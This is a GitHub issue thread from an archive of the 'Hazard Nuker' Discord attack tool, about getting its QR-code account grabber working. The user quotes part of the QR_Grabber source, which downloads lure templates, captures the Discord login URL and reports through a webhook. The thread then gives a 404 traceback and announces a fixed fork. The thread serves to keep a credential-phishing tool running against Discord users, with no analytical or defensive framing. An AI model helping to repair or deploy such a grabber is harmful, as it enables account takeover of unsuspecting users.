### ISSUE TITLE
QR code grabber not working

### ISSUE THREAD

**Issue by HangWithCmm** [dekrypted/Hazard-Archive#4]
i think this is due to the fact that in "util\QR_Grabber.py" on line 101 it says "urlretrieve(
        "https://github.com/Rdimo/images/raw/master/Hazard-Nuker/QR-Code.zip",
        filename="QR-Code.zip",
    )
    with ZipFile("QR-Code.zip", 'r')as zip2:
        zip2.extractall()
    os.remove("QR-Code.zip")

    with open(file,'wb') as handler:
        handler.write(img_data)

    discord_login = driver.current_url
    logo_qr()
    paste_template()

    #remove the templates
    os.remove(os.getcwd()+"\\QR-Code\\overlay.png")
    os.remove(os.getcwd()+"\\QR-Code\\template.png")
    os.remove(os.getcwd()+"\\QR-Code\\temp_qr_code.png")"

**Comment by HangWithCmm** [comment]
These are the errors I get:

"Downloading templates for QR code
Traceback (most recent call last):
  File "hazard.py", line 534, in <module>
    main()
  File "hazard.py", line 334, in main
    util.QR_Grabber.QR_Grabber(WebHook)
  File "util\QR_Grabber.py", line 101, in QR_Grabber
    urlretrieve(
  File "\AppData\Local\Programs\Python\Python310\Lib\urllib\request.py", line 241, in urlretrieve
    with contextlib.closing(urlopen(url, data)) as fp:
  File "\AppData\Local\Programs\Python\Python310\Lib\urllib\request.py", line 216, in urlopen
    return opener.open(url, data, timeout)
  File "\AppData\Local\Programs\Python\Python310\Lib\urllib\request.py", line 525, in open
    response = meth(req, response)
  File "\AppData\Local\Programs\Python\Python310\Lib\urllib\request.py", line 634, in http_response
    response = self.parent.error(
  File "\AppData\Local\Programs\Python\Python310\Lib\urllib\request.py", line 563, in error
    return self._call_chain(*args)
  File "\AppData\Local\Programs\Python\Python310\Lib\urllib\request.py", line 496, in _call_chain
    result = func(*args)
  File "\AppData\Local\Programs\Python\Python310\Lib\urllib\request.py", line 643, in http_error_default
    raise HTTPError(req.full_url, code, msg, hdrs, fp)
urllib.error.HTTPError: HTTP Error 404: Not Found"

P.S. I got rid of the stuff I didnt want to show like "C:\Users\name\" and that sort of stuff

**Comment by HangWithCmm** [comment]
just fixed QR-Code logger 

https://github.com/CMMALT/Hazard-Archive
